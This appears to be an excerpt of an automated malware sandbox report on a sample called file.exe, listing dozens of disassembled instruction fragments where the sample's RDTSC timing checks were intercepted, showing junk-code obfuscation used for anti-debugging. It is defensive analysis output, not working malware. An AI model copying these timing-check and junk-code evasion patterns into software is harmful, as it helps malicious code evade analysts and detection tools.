Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED2149 second address: ED2151 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push ecx 0x00000005 pop ecx 0x00000006 pushad 0x00000007 popad 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED1A96 second address: ED1A9D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop esi 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED1A9D second address: ED1ACD instructions: 0x00000000 rdtsc 0x00000002 jng 00007F5408F9689Bh 0x00000008 jmp 00007F5408F96895h 0x0000000d push eax 0x0000000e push edx 0x0000000f jmp 00007F5408F9688Fh 0x00000014 push eax 0x00000015 pop eax 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED1DEA second address: ED1DF8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F5408C21106h 0x0000000a pop esi 0x0000000b pushad 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED1DF8 second address: ED1E16 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jg 00007F5408F96886h 0x0000000a jmp 00007F5408F96892h 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED1E16 second address: ED1E47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F5408C21119h 0x0000000b jmp 00007F5408C2110Fh 0x00000010 pushad 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED678D second address: ED6791 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED6791 second address: ED67BA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 pop edx 0x0000000a pop edi 0x0000000b pushad 0x0000000c pushad 0x0000000d jno 00007F5408C21106h 0x00000013 push ecx 0x00000014 pop ecx 0x00000015 jmp 00007F5408C2110Bh 0x0000001a popad 0x0000001b push eax 0x0000001c push edx 0x0000001d jl 00007F5408C21106h 0x00000023 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED67BA second address: ED67BE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: ED67BE second address: ED67DD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408C21116h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push edx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E890F3 second address: E890F9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E890F9 second address: E89105 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop ebx 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E89105 second address: E8910C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe RDTSC instruction interceptor: First address: E8910C second address: E89171 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F5408C21108h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 movsx ecx, dx 0x00000027 mov edx, dword ptr [ebp+122D2232h] 0x0000002d mov ebx, dword ptr [ebp+1248A2EEh] 0x00000033 jnl 00007F5408C2110Eh 0x00000039 add eax, ebx 0x0000003b push eax 0x0000003c push eax 0x0000003d push edx 0x0000003e jbe 00007F5408C2110Ch 0x00000044 js 00007F5408C21106h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: E89171 second address: E891E3 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5408F9689Dh 0x00000008 pop edx 0x00000009 pop eax 0x0000000a mov dword ptr [esp], eax 0x0000000d mov edi, dword ptr [ebp+122D1EB4h] 0x00000013 push 00000004h 0x00000015 push 00000000h 0x00000017 push eax 0x00000018 call 00007F5408F96888h 0x0000001d pop eax 0x0000001e mov dword ptr [esp+04h], eax 0x00000022 add dword ptr [esp+04h], 00000017h 0x0000002a inc eax 0x0000002b push eax 0x0000002c ret 0x0000002d pop eax 0x0000002e ret 0x0000002f pushad 0x00000030 pushad 0x00000031 mov di, cx 0x00000034 popad 0x00000035 xor ecx, 6E4C7F55h 0x0000003b popad 0x0000003c mov edx, dword ptr [ebp+122D3630h] 0x00000042 push eax 0x00000043 push eax 0x00000044 push edx 0x00000045 jmp 00007F5408F96891h 0x0000004a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED6CFB second address: ED6D01 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED6D01 second address: ED6D1D instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96898h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED7786 second address: ED77A9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C21115h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push edx 0x0000000a push edi 0x0000000b jno 00007F5408C21106h 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9D8D second address: ED9DA0 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Fh 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9DA0 second address: ED9DAA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9DAA second address: ED9DAE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9DAE second address: ED9DD2 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Ah 0x00000007 jmp 00007F5408C21110h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push edi 0x00000011 pop edi 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9DD2 second address: ED9DD6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: ED9DD6 second address: ED9DDA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDDCAC second address: EDDCB0 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDCF2B second address: EDCF30 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD077 second address: EDD088 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408F9688Ah 0x00000009 pushad 0x0000000a popad 0x0000000b popad 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD088 second address: EDD0B2 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 jnp 00007F5408C21106h 0x00000009 jmp 00007F5408C21118h 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 ja 00007F5408C21106h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD0B2 second address: EDD0D6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96899h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD0D6 second address: EDD0FF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jmp 00007F5408C21116h 0x0000000b jno 00007F5408C21106h 0x00000011 popad 0x00000012 pushad 0x00000013 pushad 0x00000014 popad 0x00000015 push edi 0x00000016 pop edi 0x00000017 popad 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD0FF second address: EDD121 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96896h 0x00000007 push eax 0x00000008 push edx 0x00000009 push ecx 0x0000000a pop ecx 0x0000000b jl 00007F5408F96886h 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD256 second address: EDD275 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F5408C21106h 0x0000000a push edx 0x0000000b pop edx 0x0000000c popad 0x0000000d jmp 00007F5408C2110Ah 0x00000012 jp 00007F5408C21112h 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD275 second address: EDD27B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD27B second address: EDD286 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 pushad 0x00000007 push eax 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD6AF second address: EDD6D7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push edx 0x0000000a jmp 00007F5408F96898h 0x0000000f ja 00007F5408F96886h 0x00000015 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD6D7 second address: EDD6E9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Ch 0x00000007 pushad 0x00000008 popad 0x00000009 pop edx 0x0000000a pop eax 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD82B second address: EDD835 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ecx 0x00000005 pushad 0x00000006 popad 0x00000007 push ebx 0x00000008 pop ebx 0x00000009 pop ecx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EDD835 second address: EDD83F instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5408C21120h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE5205 second address: EE5209 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE5209 second address: EE5218 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jnc 00007F5408C21106h 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE5218 second address: EE521E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE521E second address: EE5230 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop eax 0x00000006 pushad 0x00000007 push ebx 0x00000008 jnp 00007F5408C21106h 0x0000000e pop ebx 0x0000000f push eax 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE319C second address: EE31A0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE370D second address: EE3718 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 push edx 0x0000000a pop edx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3A37 second address: EE3A3D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3A3D second address: EE3A43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE3A43 second address: EE3A47 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE40E4 second address: EE40EA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE40EA second address: EE40EE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE40EE second address: EE4123 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 ja 00007F5408C21106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jg 00007F5408C21118h 0x00000012 jmp 00007F5408C2110Ch 0x00000017 jp 00007F5408C21106h 0x0000001d jmp 00007F5408C2110Ch 0x00000022 popad 0x00000023 pushad 0x00000024 pushad 0x00000025 push eax 0x00000026 push edx 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE4123 second address: EE4154 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408F9688Fh 0x00000009 popad 0x0000000a jmp 00007F5408F96895h 0x0000000f push eax 0x00000010 push edx 0x00000011 jne 00007F5408F96886h 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE4154 second address: EE4158 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8CED second address: EE8CF3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8CF3 second address: EE8D12 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 jmp 00007F5408C21118h 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8D12 second address: EE8D33 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Ch 0x00000007 push esi 0x00000008 je 00007F5408F96886h 0x0000000e pop esi 0x0000000f pop edx 0x00000010 pop eax 0x00000011 jbe 00007F5408F9689Ch 0x00000017 push esi 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8D33 second address: EE8D41 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 push edx 0x00000006 jnp 00007F5408C21106h 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8E8F second address: EE8E95 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE8E95 second address: EE8E99 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE900C second address: EE902E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408F96897h 0x00000009 ja 00007F5408F96886h 0x0000000f popad 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE902E second address: EE903E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnp 00007F5408C21106h 0x0000000a jng 00007F5408C21106h 0x00000010 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE931D second address: EE9351 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408F96897h 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d popad 0x0000000e jmp 00007F5408F96894h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EE998D second address: EE999A instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F5408C21106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a pushad 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EEE4BB second address: EEE4C7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 pushad 0x00000006 push esi 0x00000007 pop esi 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF78F2 second address: EF78F6 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF78F6 second address: EF7900 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF7900 second address: EF790A instructions: 0x00000000 rdtsc 0x00000002 jns 00007F5408C21106h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF790A second address: EF790F instructions: 0x00000000 rdtsc 0x00000002 push ebx 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF790F second address: EF7922 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 pop edx 0x00000006 pop eax 0x00000007 pushad 0x00000008 push edi 0x00000009 jc 00007F5408C21106h 0x0000000f pop edi 0x00000010 push ecx 0x00000011 push eax 0x00000012 push edx 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF5F97 second address: EF5FAB instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F9688Eh 0x00000007 push eax 0x00000008 push edx 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF6292 second address: EF62B2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnp 00007F5408C21106h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5408C21112h 0x00000013 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF673A second address: EF6762 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408F9688Dh 0x00000009 popad 0x0000000a jmp 00007F5408F9688Ch 0x0000000f push eax 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 je 00007F5408F96886h 0x00000019 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF69ED second address: EF6A13 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408C2110Ch 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jg 00007F5408C2110Ah 0x00000011 push eax 0x00000012 push edx 0x00000013 jns 00007F5408C21106h 0x00000019 push eax 0x0000001a push edx 0x0000001b rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF6A13 second address: EF6A17 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF6A17 second address: EF6A1B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF6A1B second address: EF6A21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF70C9 second address: EF70D2 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 pushad 0x00000006 popad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF70D2 second address: EF70E9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 pushad 0x00000008 push eax 0x00000009 pop eax 0x0000000a push edi 0x0000000b pop edi 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 push eax 0x00000014 push edx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF70E9 second address: EF70F7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F5408C2110Ah 0x00000009 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EF70F7 second address: EF7111 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F5408F96890h 0x00000007 jc 00007F5408F96886h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD1BC second address: EFD1C0 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFD456 second address: EFD467 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 jnc 00007F5408F96886h 0x0000000f push ecx 0x00000010 pop ecx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFFAD9 second address: EFFAEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushad 0x00000004 popad 0x00000005 push edx 0x00000006 pop edx 0x00000007 popad 0x00000008 je 00007F5408C2110Eh 0x0000000e push ecx 0x0000000f pop ecx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFFAEB second address: EFFAFC instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 je 00007F5408F96896h 0x0000000c pushad 0x0000000d push ecx 0x0000000e pop ecx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: EFF972 second address: EFF976 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A7F5 second address: F0A806 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F5408F96886h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A806 second address: F0A815 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5408C21106h 0x0000000a popad 0x0000000b push esi 0x0000000c pushad 0x0000000d popad 0x0000000e pop esi 0x0000000f rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A179 second address: F0A17F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A17F second address: F0A187 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A187 second address: F0A1AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jc 00007F5408F96886h 0x0000000a popad 0x0000000b pop edi 0x0000000c push eax 0x0000000d push edx 0x0000000e jmp 00007F5408F9688Dh 0x00000013 jmp 00007F5408F9688Ch 0x00000018 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F0A333 second address: F0A36B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ecx 0x00000004 pop ecx 0x00000005 jne 00007F5408C21106h 0x0000000b popad 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f pushad 0x00000010 popad 0x00000011 jo 00007F5408C21106h 0x00000017 popad 0x00000018 pop edx 0x00000019 pop eax 0x0000001a push eax 0x0000001b push edx 0x0000001c push edx 0x0000001d pushad 0x0000001e popad 0x0000001f push eax 0x00000020 pop eax 0x00000021 pop edx 0x00000022 jmp 00007F5408C21116h 0x00000027 rdtsc
                Source: C:\Users\user\Desktop\file.exeRDTSC instruction interceptor: First address: F115CD second address: F115DA instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push ebx 0x00000004 pop ebx 0x00000005 js 00007F5408F96886h 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
